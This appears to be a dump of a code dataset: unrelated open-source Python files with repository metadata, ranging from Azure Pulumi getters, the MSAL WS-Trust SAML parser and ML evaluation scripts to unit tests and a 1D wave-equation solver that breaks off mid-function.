health_check_status=pulumi.get(__ret__, 'health_check_status'),
id=pulumi.get(__ret__, 'id'),
location=pulumi.get(__ret__, 'location'),
name=pulumi.get(__ret__, 'name'),
networking_resource_group_name=pulumi.get(__ret__, 'networking_resource_group_name'),
organization_unit=pulumi.get(__ret__, 'organization_unit'),
provisioning_state=pulumi.get(__ret__, 'provisioning_state'),
subnet_id=pulumi.get(__ret__, 'subnet_id'),
system_data=pulumi.get(__ret__, 'system_data'),
tags=pulumi.get(__ret__, 'tags'),
type=pulumi.get(__ret__, 'type'))
@_utilities.lift_output_func(get_network_connection)
def get_network_connection_output(network_connection_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetNetworkConnectionResult]:
"""
Gets a network connection resource
Azure REST API version: 2023-04-01.
:param str network_connection_name: Name of the Network Connection that can be applied to a Pool.
:param str resource_group_name: The name of the resource group. The name is case insensitive.
"""
...
|
f5f449e826d68c681c0727bb8e14ee019f6e279d
|
519037f251bf4a46f166529c9cc44f6ad6b54d4d
|
/tests/exploratory/multiple_basedirs/radish2/steps.py
|
793b431cf5d0d878ea1f8b1e525e56a41bc825c6
|
[
"MIT"
] |
permissive
|
radish-bdd/radish
|
0783d68b4faa3bfdb4364475353a4113b5e1aa70
|
1bc9e001c24c263ad8ce45d2dff97b89d41082a8
|
refs/heads/main
| 2023-08-22T17:33:14.194441
| 2023-08-17T18:24:32
| 2023-08-17T18:24:32
| 36,678,450
| 193
| 53
|
MIT
| 2023-08-17T18:21:36
| 2015-06-01T17:59:33
|
Python
|
UTF-8
|
Python
| false
| false
| 171
|
py
|
steps.py
|
# -*- coding: utf-8 -*-
from radish import then
@then("I expect the result to be {result:g}")
def expect_result(step, result):
assert step.context.result == result
|
a188b1290fa98b1236ea19baccb602c699ea3fb1
|
952dc66c61966f099756cdb6c2d13b40352f63cc
|
/zerver/management/commands/enqueue_digest_emails.py
|
6507335c5121cedff954d57d712caffefccc7b15
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
zulip/zulip
|
5ae6aad35fd9f72996c0a2a9cdd674400966ebf6
|
965a25d91b6ee2db54038f5df855215fa25146b0
|
refs/heads/main
| 2023-08-28T23:43:00.971110
| 2023-08-28T16:47:09
| 2023-08-28T19:33:02
| 43,160,685
| 20,239
| 8,996
|
Apache-2.0
| 2023-09-14T20:57:47
| 2015-09-25T16:37:25
|
Python
|
UTF-8
|
Python
| false
| false
| 691
|
py
|
enqueue_digest_emails.py
|
import datetime
import logging
from typing import Any
from django.conf import settings
from django.core.management.base import BaseCommand
from django.utils.timezone import now as timezone_now
from zerver.lib.digest import DIGEST_CUTOFF, enqueue_emails
from zerver.lib.logging_util import log_to_file
## Logging setup ##
logger = logging.getLogger(__name__)
log_to_file(logger, settings.DIGEST_LOG_PATH)
class Command(BaseCommand):
help = """Enqueue digest emails for users that haven't checked the app
in a while.
"""
def handle(self, *args: Any, **options: Any) -> None:
cutoff = timezone_now() - datetime.timedelta(days=DIGEST_CUTOFF)
enqueue_emails(cutoff)
|
6656a28d5aca6e1604b6dc18e799258832570af9
|
b65a7cad11c96682628ff023a24a617118733881
|
/evaluation.py
|
4b6c098ae197d7956de8970d2d2b7e858b504c4e
|
[
"MIT"
] |
permissive
|
YonghaoXu/SEANet
|
abb1f80f3ce37755d7be4fda5ab0d67ec3f3d178
|
73aea56761968562593ac81c681e791b449cb919
|
refs/heads/master
| 2021-06-19T21:02:29.472077
| 2021-06-17T01:21:53
| 2021-06-17T01:21:53
| 166,198,006
| 106
| 13
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,275
|
py
|
evaluation.py
|
import argparse
import scipy
from scipy import ndimage
import numpy as np
import sys
import torch
from torch.autograd import Variable
import torchvision.models as models
import torch.nn.functional as F
from torch.utils import data, model_zoo
from model.SEAN import SEANet
from dataset.cityscapes_dataset import cityscapesDataSet
from collections import OrderedDict
import os
from PIL import Image
from utils.tools import *
import matplotlib.pyplot as plt
import torch.nn as nn
IMG_MEAN = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32)
def get_arguments():
"""Parse all the arguments provided from the CLI.
Returns:
      The parsed arguments as an argparse.Namespace.
"""
parser = argparse.ArgumentParser(description="SEAN")
parser.add_argument("--data_dir", type=str, default='/data/yonghao.xu/SegmentationData/cityscapes/',
help="target dataset path.")
parser.add_argument("--data_list", type=str, default='./dataset/cityscapes_labellist_val.txt',
help="target dataset list file.")
parser.add_argument("--ignore-label", type=int, default=255,
help="the index of the label to ignore in the training.")
parser.add_argument("--num-classes", type=int, default=19,
help="number of classes.")
parser.add_argument("--restore-from", type=str, default='/data/yonghao.xu/PreTrainedModel/GTA2Cityscapes.pth',
help="restored model.")
parser.add_argument("--snapshot_dir", type=str, default='./Snap/Maps',
help="Path to save result.")
return parser.parse_args()
def main():
"""Create the model and start the evaluation process."""
args = get_arguments()
if not os.path.exists(args.snapshot_dir):
os.makedirs(args.snapshot_dir)
    f = open(os.path.join(args.snapshot_dir, 'Evaluation.txt'), 'w')
model = SEANet(num_classes=args.num_classes)
saved_state_dict = torch.load(args.restore_from)
model.load_state_dict(saved_state_dict)
model.eval()
model.cuda()
testloader = data.DataLoader(cityscapesDataSet(args.data_dir, args.data_list, crop_size=(1024, 512), mean=IMG_MEAN, scale=False, mirror=False, set='val'),
batch_size=1, shuffle=False, pin_memory=True)
input_size_target = (2048,1024)
interp = nn.Upsample(size=(1024,2048), mode='bilinear')
test_mIoU(f,model, testloader, 0,input_size_target,print_per_batches=10)
for index, batch in enumerate(testloader):
if index % 100 == 0:
            print('%d processed' % index)
image, _,_, name = batch
_,output = model(image.cuda())
output = interp(output).cpu().data[0].numpy()
output = output.transpose(1,2,0)
output = np.asarray(np.argmax(output, axis=2), dtype=np.uint8)
output_col = colorize_mask(output)
output = Image.fromarray(output)
name = name[0].split('/')[-1]
output.save('%s/%s' % (args.snapshot_dir, name))
output_col.save('%s/%s_color.png' % (args.snapshot_dir, name.split('.')[0]))
f.close()
if __name__ == '__main__':
main()
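# Example invocation (a sketch; the paths below are placeholders and must
# point at a local Cityscapes copy and a trained checkpoint):
#
#   python evaluation.py --data_dir /path/to/cityscapes/ \
#       --data_list ./dataset/cityscapes_labellist_val.txt \
#       --restore-from /path/to/GTA2Cityscapes.pth \
#       --snapshot_dir ./Snap/Maps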
|
a54e30e838964d5400b3cd48356c267cda148fc2
|
5917ffcb780cfcfe4e2b87b11fca1f68f387b239
|
/plenum/test/view_change_slow_nodes/test_view_change_2_of_4_nodes_with_old_and_new_primary.py
|
b068d153b6a3bfddb239cb9c4ca4e36d4c3294ac
|
[
"Apache-2.0"
] |
permissive
|
hyperledger/indy-plenum
|
6ff9f705af80dfa28d4cb92743683f78bb937aa3
|
698b9500ad3a7a15993af72a1c35a406c5673262
|
refs/heads/main
| 2023-08-29T01:32:26.384729
| 2023-06-20T16:42:11
| 2023-06-20T16:42:11
| 51,585,028
| 171
| 420
|
Apache-2.0
| 2023-06-20T16:42:14
| 2016-02-12T12:03:16
|
Python
|
UTF-8
|
Python
| false
| false
| 1,280
|
py
|
test_view_change_2_of_4_nodes_with_old_and_new_primary.py
|
from plenum.test.test_node import get_master_primary_node, get_first_master_non_primary_node
from plenum.test.view_change.helper import view_change_in_between_3pc
def slow_nodes(node_set):
return [get_master_primary_node(node_set),
get_first_master_non_primary_node(node_set)]
def test_view_change_in_between_3pc_2_of_4_nodes_with_old_and_new_primary(
txnPoolNodeSet, looper, sdk_pool_handle, sdk_wallet_client):
"""
- Slow processing 3PC messages for 2 of 4 node (2>f)
- Slow both current and next primaries
- do view change
"""
view_change_in_between_3pc(looper, txnPoolNodeSet,
slow_nodes(txnPoolNodeSet),
sdk_pool_handle, sdk_wallet_client)
def test_view_change_in_between_3pc_2_of_4_nodes_with_old_and_new_primary_long_delay(
txnPoolNodeSet, looper, sdk_pool_handle, sdk_wallet_client):
"""
- Slow processing 3PC messages for 2 of 4 node (2>f)
- Slow both current and next primaries
- do view change
"""
view_change_in_between_3pc(looper, txnPoolNodeSet,
slow_nodes(txnPoolNodeSet),
sdk_pool_handle, sdk_wallet_client,
slow_delay=20)
|
8022dd572b0795bc85b510297459cfdadadf5132
|
5deeb3618189cca6f66e91d1ddcb3ce63dede8ff
|
/msal/wstrust_response.py
|
9c58af23fccd539e68bf1c2f36f2af6d2313deef
|
[
"MIT"
] |
permissive
|
AzureAD/microsoft-authentication-library-for-python
|
f157efc1ec6c6d91a132f3dc8dc4742d7a309b78
|
bba6b146d6fca64d43eaf313da654c0570ccd497
|
refs/heads/dev
| 2023-09-03T14:34:20.487126
| 2023-08-23T08:10:18
| 2023-08-23T08:10:18
| 67,243,113
| 717
| 188
|
NOASSERTION
| 2023-09-12T16:46:21
| 2016-09-02T17:45:26
|
Python
|
UTF-8
|
Python
| false
| false
| 4,599
|
py
|
wstrust_response.py
|
#------------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation.
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#------------------------------------------------------------------------------
try:
from xml.etree import cElementTree as ET
except ImportError:
from xml.etree import ElementTree as ET
import re
from .mex import Mex
SAML_TOKEN_TYPE_V1 = 'urn:oasis:names:tc:SAML:1.0:assertion'
SAML_TOKEN_TYPE_V2 = 'urn:oasis:names:tc:SAML:2.0:assertion'
# http://docs.oasis-open.org/wss-m/wss/v1.1.1/os/wss-SAMLTokenProfile-v1.1.1-os.html#_Toc307397288
WSS_SAML_TOKEN_PROFILE_V1_1 = "http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1"
WSS_SAML_TOKEN_PROFILE_V2 = "http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0"
def parse_response(body): # Returns {"token": "<saml:assertion ...>", "type": "..."}
token = parse_token_by_re(body)
if token:
return token
error = parse_error(body)
raise RuntimeError("WsTrust server returned error in RSTR: %s" % (error or body))
def parse_error(body): # Returns error as a dict. See unit test case for an example.
dom = ET.fromstring(body)
reason_text_node = dom.find('s:Body/s:Fault/s:Reason/s:Text', Mex.NS)
subcode_value_node = dom.find('s:Body/s:Fault/s:Code/s:Subcode/s:Value', Mex.NS)
if reason_text_node is not None or subcode_value_node is not None:
return {"reason": reason_text_node.text, "code": subcode_value_node.text}
def findall_content(xml_string, tag):
"""
Given a tag name without any prefix,
this function returns a list of the raw content inside this tag as-is.
>>> findall_content("<ns0:foo> what <bar> ever </bar> content </ns0:foo>", "foo")
[" what <bar> ever </bar> content "]
Motivation:
    Usually we would use an XML parser to extract the data by XPath.
    However, ElementTree in Python implicitly normalizes the output
    by "hoisting" the inner inline namespaces into the outermost element.
    The result is a semantically equivalent XML snippet,
    but not fully identical to the original one.
    While this effect is harmless in most other cases,
    it does not seem to fully comply with the Exclusive XML Canonicalization
    spec (https://www.w3.org/TR/xml-exc-c14n/), and voids the SAML token
    signature. The SAML signature algorithm needs the
    "XML -> C14N(XML) -> Signed(C14N(XML))" order.
    The binary extension lxml is probably the canonical way to solve this
    (https://stackoverflow.com/questions/22959577/python-exclusive-xml-canonicalization-xml-exc-c14n)
    but here we use a regex-based workaround to return the raw content as-is.
"""
# \w+ is good enough for https://www.w3.org/TR/REC-xml/#NT-NameChar
pattern = r"<(?:\w+:)?%(tag)s(?:[^>]*)>(.*)</(?:\w+:)?%(tag)s" % {"tag": tag}
return re.findall(pattern, xml_string, re.DOTALL)
def parse_token_by_re(raw_response): # Returns the saml:assertion
for rstr in findall_content(raw_response, "RequestSecurityTokenResponse"):
token_types = findall_content(rstr, "TokenType")
tokens = findall_content(rstr, "RequestedSecurityToken")
if token_types and tokens:
# Historically, we use "us-ascii" encoding, but it should be "utf-8"
# https://stackoverflow.com/questions/36658000/what-is-encoding-used-for-saml-conversations
return {"token": tokens[0].encode('utf-8'), "type": token_types[0]}
|
8028aa1d1d3a03b809ec3369b96176feae6a846e
|
b5510b559210c385c1e86433f7ed22eeec83758c
|
/kvirt/providers/kvm/helpers.py
|
2e236c286ec15bc88aaf441da542b10eca36b052
|
[
"Apache-2.0"
] |
permissive
|
karmab/kcli
|
adae878fb84f38583032563928e401d7c71e6b86
|
7991e2d3468ce1b43a98a2f9b19db76121335f6c
|
refs/heads/main
| 2023-08-31T00:01:28.407676
| 2023-08-30T21:26:34
| 2023-08-30T21:26:34
| 67,212,828
| 430
| 149
|
Apache-2.0
| 2023-09-13T21:59:18
| 2016-09-02T10:13:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,965
|
py
|
helpers.py
|
DHCPKEYWORDS = ['T1',
'T2',
'all-subnets-local',
'arp-timeout',
'boot-file-size',
'bootfile-name',
'bootfile-param',
'bootfile-url',
'classless-static-route',
'client-arch',
'client-interface-id',
'client-machine-id',
'default-ttl',
'dns-server',
'domain-name',
'domain-search',
'ethernet-encap',
'extension-path',
'information-refresh-time',
'ip-forward-enable',
'irc-server',
'log-server',
'lpr-server',
'max-datagram-reassembly',
'mobile-ip-home',
'netbios-dd',
'netbios-nodetype',
'netbios-ns',
'netbios-scope',
'netmask',
'nis+-domain',
'nis+-server',
'nis-domain',
'nis-server',
'nntp-server',
'non-local-source-routing',
'ntp-server',
'policy-filter',
'pop3-server',
'root-path',
'router',
'router-discovery',
'router-solicitation',
'server-ip-address',
'sip-server',
'sip-server-domain',
'smtp-server',
'sntp-server',
'static-route',
'swap-server',
'tcp-keepalive',
'tcp-ttl',
'tftp-server',
'time-offset',
'trailer-encapsulation',
'user-class',
'vendor-class',
'vendor-id-encap',
'x-windows-dm',
'x-windows-fs']
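# A minimal sketch of how this whitelist might be used (the helper below is
# an illustration, not part of kcli's API):
def is_valid_dhcp_keyword(keyword):
    """Return True if keyword is one of the recognized DHCP option names."""
    return keyword in DHCPKEYWORDS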
|
e4196051194f73bf708993713651e40b3c9e7ea9
|
e1351a65665f78af78f191c1a7b92a8511beddb6
|
/esmvaltool/utils/prov2files.py
|
15873893d562bf74c6c3cf22e76807118a78266a
|
[
"LicenseRef-scancode-proprietary-license",
"Apache-2.0"
] |
permissive
|
ESMValGroup/ESMValTool
|
5364262eee9f1bb5e8084e73e2a18565e958fdfa
|
0d2b68d6614c667141207affd7834cc49d34b203
|
refs/heads/main
| 2023-08-24T20:05:57.882973
| 2023-08-24T11:34:49
| 2023-08-24T11:34:49
| 80,120,461
| 196
| 138
|
Apache-2.0
| 2023-09-14T15:32:43
| 2017-01-26T14:15:37
|
NCL
|
UTF-8
|
Python
| false
| false
| 2,159
|
py
|
prov2files.py
|
"""Print out the input files used to generate a result."""
import argparse
from prov.model import ProvDerivation, ProvDocument
def prov2files(filename):
"""Figure out what file was generated from which source files.
Parameters
----------
filename: str
Name of the file containing the provenance.
Returns
-------
(str, list[str])
A tuple, the first entry is the name of the result
and the second entry a list of files used to compute
that result.
"""
provenance = ProvDocument.deserialize(filename, format='xml')
source_files = set()
generated_files = set()
for rec in provenance.get_records(ProvDerivation):
# Find all derivation relations
generated, used = rec.args[:2]
source_files.add(used.localpart)
generated_files.add(generated.localpart)
# Filter out intermediate files
intermediate_files = source_files & generated_files
source_files = source_files - intermediate_files
result_files = generated_files - intermediate_files
    if len(result_files) != 1:
# If this changes, need to rewrite this function so it
# builds a provenance graph.
raise ValueError("Invalid provenance file encountered,"
" ESMValTool provenance describes one result only.")
return result_files.pop(), sorted(source_files)
def main():
"""Print out a list of files."""
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
'provenance_files',
nargs='+',
type=str,
help='Path to one or more files containing provenance.')
args = parser.parse_args()
for filename in args.provenance_files:
if not filename.endswith('_provenance.xml'):
print("Skipping", filename,
"does it contain ESMValTool provenance?")
continue
result, files = prov2files(filename)
print(f"{result} was derived from:")
print('\n'.join(files))
print('')
if __name__ == '__main__':
main()
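# Example invocation (paths are placeholders; only files whose names end in
# "_provenance.xml" are processed, as checked in main()):
#
#   python prov2files.py recipe_output/plots/*_provenance.xml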
|
ff93b305bd1d0be0412f0f10c8d718276ec0efa0
|
3a6a211ea0d32405497fbd6486c490bb147e25f9
|
/catapult_build/build_steps_unittest.py
|
4d76e811997cfb4345bba00ade2aa91bf376c75a
|
[
"BSD-3-Clause"
] |
permissive
|
catapult-project/catapult
|
e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0
|
53102de187a48ac2cfc241fef54dcbc29c453a8e
|
refs/heads/main
| 2021-05-25T07:37:22.832505
| 2021-05-24T08:01:49
| 2021-05-25T06:07:38
| 33,947,548
| 2,032
| 742
|
BSD-3-Clause
| 2022-08-26T16:01:18
| 2015-04-14T17:49:05
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,910
|
py
|
build_steps_unittest.py
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import unittest
from catapult_build import build_steps
class BuildStepsTest(unittest.TestCase):
def testCatapultTestList(self):
catapult_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
for test in build_steps._CATAPULT_TESTS:
self.assertIn('name', test, msg=(
'All tests in build_steps._CATAPULT_TESTS must have a name;'
' error in:\n %s' % test))
self.assertIsInstance(test['name'], str, msg=(
'Test name %s in build_steps._CATAPULT_TESTS must be a string.'
% test['name']))
self.assertIn('path', test, msg=(
'All tests in build_steps._CATAPULT_TESTS must have a path '
'relative to catapult/; error in:\n %s' % test))
abs_path = os.path.join(catapult_dir, test['path'])
self.assertTrue(os.path.exists(abs_path), msg=(
'Bad path %s in build_steps._CATAPULT_TESTS; '
' should be relative to catapult/' % test['path']))
if test.get('additional_args'):
self.assertIsInstance(test['additional_args'], list, msg=(
'additional_args %s in build_steps._CATAPULT_TESTS %s not a list'
% (test['additional_args'], test['name'])
))
if test.get('disabled'):
self.assertIsInstance(test['disabled'], list, msg=(
'disabled %s in build_steps._CATAPULT_TESTS for %s not a list'
% (test['disabled'], test['name'])
))
for platform in test['disabled']:
self.assertIn(platform, ['win', 'mac', 'linux', 'android'], msg=(
            'Bad platform %s in build_steps._CATAPULT_TESTS for %s;'
            ' should be one of "linux", "win", "mac", "android"' % (
platform, test['name'])
))
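# There is no __main__ guard here; a typical way to run these tests is via
# unittest discovery from the repository root (an assumption about the local
# checkout layout):
#
#   python -m unittest catapult_build.build_steps_unittest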
|
882bfa24fed605cb5465ae67378fabe07cd9aedf
|
6f2fef1b207299681f8d67d3831c400bb91de04b
|
/data_collection/gazette/spiders/ma_codo.py
|
2382d3a428457b643935c1ea8875992657704213
|
[
"MIT"
] |
permissive
|
okfn-brasil/querido-diario
|
76177747aa5ad47e99514f38402e6bc747b9a715
|
548a9b1b2718dc78ba8ccb06b36cf337543ad71d
|
refs/heads/main
| 2023-08-22T04:26:30.798196
| 2023-08-18T14:12:37
| 2023-08-18T14:12:37
| 127,598,755
| 402
| 233
|
MIT
| 2023-09-14T18:56:02
| 2018-04-01T05:01:21
|
Python
|
UTF-8
|
Python
| false
| false
| 298
|
py
|
ma_codo.py
|
import datetime as dt
from gazette.spiders.base.aplus import BaseAplusSpider
class MaCodoSpider(BaseAplusSpider):
TERRITORY_ID = "2103307"
name = "ma_codo"
start_date = dt.date(2020, 2, 17)
allowed_domains = ["codo.ma.gov.br"]
url_base = "https://www.codo.ma.gov.br/diario/"
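# Example run from a querido-diario checkout (assuming the standard Scrapy
# project layout; the spider is addressed by its `name` attribute):
#
#   scrapy crawl ma_codo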
|
8637314a87b241e05141f8da87607b4c55ae7eb9
|
0a8a4bfd6b4ffcfb7c99119c83cb3abe17c4a8f6
|
/test/util/util_test.py
|
76b7da8b4bdfe4a534f5310a6e392a8ee48c3050
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
google/openhtf
|
58c06e07508f9bb2079070a5ac03898fc68c1778
|
3a9a24987b2b34782fca55a8df8d007167dbb19a
|
refs/heads/master
| 2023-08-23T12:12:54.917649
| 2023-07-27T01:51:17
| 2023-07-27T01:51:43
| 41,519,483
| 471
| 253
|
Apache-2.0
| 2023-09-12T00:47:42
| 2015-08-28T01:14:17
|
Python
|
UTF-8
|
Python
| false
| false
| 2,571
|
py
|
util_test.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import time
import unittest
from unittest import mock
from openhtf import util
from openhtf.util import timeouts
class TestUtil(unittest.TestCase):
def setUp(self):
super(TestUtil, self).setUp()
self.timeout = 60
self.polledtimeout = timeouts.PolledTimeout(self.timeout)
@mock.patch.object(time, 'time')
def test_time_expired_false(self, mock_time):
elapsed = 3
mock_time.side_effect = [1, 1 + elapsed, 2 + elapsed]
self.polledtimeout.restart()
sec = self.polledtimeout.seconds
self.assertLessEqual(sec, self.timeout - elapsed)
self.assertFalse(self.polledtimeout.has_expired())
def test_time_expired_true(self):
self.polledtimeout.expire()
self.assertTrue(self.polledtimeout.has_expired())
def test_partial_format(self):
original = ('Apples are {apple[color]} and {apple[taste]}. '
'Pears are {pear.color} and {pear.taste}. '
'Oranges are {orange_color} and {orange_taste}.')
text = copy.copy(original)
apple = {
'color': 'red',
'taste': 'sweet',
}
class Pear(object):
color = 'green'
taste = 'tart'
pear = Pear()
# Partial formatting
res = util.partial_format(text, apple=apple)
res = util.partial_format(res, pear=pear)
self.assertEqual(
'Apples are red and sweet. Pears are green and tart. '
'Oranges are {orange_color} and {orange_taste}.', res)
# Format rest of string
res = util.partial_format(res, orange_color='orange', orange_taste='sour')
self.assertEqual(
'Apples are red and sweet. Pears are green and tart. '
'Oranges are orange and sour.', res)
# The original text has not changed
self.assertEqual(original, text)
# Make sure no unexpected problems with an empty string
empty_string = ''
self.assertEqual('', util.partial_format(empty_string))
self.assertEqual('', util.partial_format(empty_string, foo='bar'))
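# Allow running this test module directly; upstream may instead rely on a
# separate test runner, so this guard is an addition for convenience.
if __name__ == '__main__':
  unittest.main()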
|
1f679e9ba1f43f3795bba7c491967f40cde64ce6
|
6923f79f1eaaba0ab28b25337ba6cb56be97d32d
|
/Python_Scripting_for_Computational_Science_Third_Edition/py/examples/pde/wave1D_func5.py
|
52fd2124bb46cfb9e6c43b0fc0890227c7280792
|
[] |
no_license
|
burakbayramli/books
|
9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0
|
5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95
|
refs/heads/master
| 2023-08-17T05:31:08.885134
| 2023-08-14T10:05:37
| 2023-08-14T10:05:37
| 72,460,321
| 223
| 174
| null | 2022-10-24T12:15:06
| 2016-10-31T17:24:00
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 12,176
|
py
|
wave1D_func5.py
|
#!/usr/bin/env python
"""
As wave1D_func4.py, but the problem is formalized in terms of ODEs.
"""
from __future__ import division # disable integer division
from scitools.numpyutils import *
from CurveViz import *
def ic_scalar(u, x, I, U_0, U_L):
n = u.shape[0] - 1
t = 0
for i in iseq(0,n):
u[i] = I(x[i])
u[0] = U_0(t); u[n] = U_L(t)
return u
def scheme_scalar(rhs, u, c, f, x, t, n, dx):
C = (float(c)/dx)**2
for i in iseq(start=1, stop=n-1):
rhs[i] = C*(u[i-1] - 2*u[i] + u[i+1]) + f(x[i], t)
rhs[0] = 0 # assume U_0 and U_L are constant or linear in time!!!
rhs[n] = 0
return rhs
def scheme_vec(rhs, u, c, f, x, t, n, dx):
C = (float(c)/dx)**2
rhs[1:n] = C*(u[0:n-1] - 2*u[1:n] + u[2:n+1]) + f(x[1:n], t)
rhs[0] = 0 # assume U_0 and U_L are constant or linear in time!!!
rhs[n] = 0
return rhs
def Dirichlet_bc_scalar(up, U_0, U_L, t, n):
up[0] = U_0(t); up[n] = U_L(t)
return up
class WaveRHS:
"""
Wrapper for the scheme_* and bc_* functions such that
a ODE solver can call a "right-hand side" function with only
state and time as arguments. All other information are stored
as class attributes here, and __call__ and bc wraps calls to
the underlying straight functions where the actual numerics
is implemented.
"""
def __init__(self, *args):
self.rhs, self.u, self.c, self.f, self.x, \
self.n, self.dx, self.version, self.with_bc, \
self.U_0, self.U_L = args
if self.version == 'scalar':
self.scheme = scheme_scalar
elif self.version == 'vectorized':
self.scheme = scheme_vec
def __call__(self, u, t):
if self.with_bc:
# u (from ODESolver) contains boundary data
self.u = u
self.rhs = self.scheme(self.rhs, self.u, self.c, self.f,
self.x, t, self.n, self.dx)
return self.rhs
else:
# u does not contain boundary data, embed u in self.u
self.u[1:-1] = u
# insert bc:
self.u = self.bc(self.u, t) # may be extra work for constant bc...
self.rhs = self.scheme(self.rhs, self.u, self.c, self.f,
self.x, t, self.n, self.dx)
return self.rhs[1:-1] # only inner points enter ODE system
def bc(self, up, t):
return Dirichlet_bc_scalar(up, self.U_0, self.U_L, t, self.n)
def ODEStep(u, um, t, dt, F):
"""2nd order explicit scheme for u''=F(u,t)."""
up = 2*u - um + dt*dt*F(u, t)
return up
def ODEStep1(u, t, dt, F):
"""Special formula for 1st time step (u_t=0 as IC)."""
up = u + 0.5*dt*dt*F(u, t)
return up
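# Background for the two steps above (standard derivation, restated here):
# discretizing u'' = F(u, t) with a central difference in time,
#     (u^{k+1} - 2*u^k + u^{k-1})/dt**2 = F(u^k, t_k),
# rearranges to the update in ODEStep. At the first step u^{-1} is unknown;
# the initial condition u_t = 0 gives u^{-1} = u^{1}, and substituting that
# into the scheme yields the special half-weighted formula in ODEStep1.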
class ODESolver:
def __init__(self, F, dt, u0,
user_action=None, user_action_args=[]):
self.F = F
self.dt = dt
self.user_action = user_action
self.user_action_args = user_action_args
# insert IC:
self.u = u0.copy()
self.um = zeros(len(self.u))
if self.u.shape != self.um.shape:
raise ValueError, 'incompatible shapes'
self.up = self.um.copy()
self.step = ODEStep
self.step1 = ODEStep1
def timeloop(self, tstop):
t = 0
if self.user_action is not None:
self.user_action(self.u, t, *self.user_action_args)
t_old = t; t += self.dt
if self.F.with_bc:
self.up = self.step1(self.u, t_old, self.dt, self.F)
else:
self.up[1:-1] = self.step1(self.u[1:-1], t_old, self.dt, self.F)
self.up = self.F.bc(self.up, t)
if self.user_action is not None:
self.user_action(self.up, t, *self.user_action_args)
# ready for next step:
self.um, self.u, self.up = self.u, self.up, self.um
time_step = 1
while t <= tstop:
t_old = t; t += self.dt
time_step += 1
if self.F.with_bc:
self.up = ODEStep(self.u, self.um, t_old, self.dt, self.F)
                if self.up[0] != 0 or self.up[-1] != 0:
                    print t, self.up[0], self.up[-1]
else:
self.up[1:-1] = ODEStep(self.u[1:-1], self.um[1:-1], t_old,
self.dt, self.F)
self.up = self.F.bc(self.up, t)
if self.user_action is not None:
self.user_action(self.up, t, *self.user_action_args)
# switch references for next step:
self.um, self.u, self.up = self.u, self.up, self.um
def solver(I, f, c, U_0, U_L, L, n, dt, tstop,
user_action=None, version='scalar'):
"""
Solve the wave equation u_tt=u_xx + f(x,t) on (0,L) with
u(0,t)=U_0(t), u(L,t)=U_L(t), for t=dt,2*dt,...,tstop
Initial conditions: u(x,0)=I(x), du/dt=0.
n is the total number of grid cells; grid points are numbered
from 0 to n.
dt is the time step. If dt<=0, the optimal time step
(dt=dx/c) is used.
tstop is the stop time for the simulation.
I, f, U_0, U_L are functions: I(x), f(x,t), U_0(t), U_L(t)
user_action is a function of (u, t, x) where the calling code
can add visualization, error computations, data analysis,
store solutions, etc.
This routine assumes that ODESolver is used to solve the ODEs
u_tt=F, where F is a class WaveRHS. (Should be parameter to this func!!!)
"""
import time
t0 = time.clock()
dx = L/float(n)
x = linspace(0, L, n+1) # grid points in x dir
if dt <= 0: dt = dx/float(c) # max time step?
u = zeros(n+1) # NumPy solution array
rhs = u.copy()
# set initial condition (pointwise - allows straight if-tests):
t = 0.0
u = ic_scalar(u, x, I, U_0, U_L)
with_bc = False #True
F = WaveRHS(rhs, u, c, f, x, n, dx, version, with_bc, U_0, U_L)
solver = ODESolver(F, dt, u, user_action, [x])
solver.timeloop(tstop)
t1 = time.clock()
return dt, x, t1-t0
def visualizer(I, f, c, U_0, U_L, L, n, dt, tstop,
user_action=None, version='scalar', graphics=None):
"""
    Call solver, but let the user_action function be one where the
where the solution is visualized and stored in a list.
All arguments are passed on to the solver function,
except graphics. graphics is a plot object with the max/min
values of the y axis set in the calling code.
"""
solutions = [] # store all u fields at all time levels
def action_with_plot(u, t, x):
# note: nested function blocks may lead to
# mixing of scopes of variables - this might be tricky
if graphics is not None:
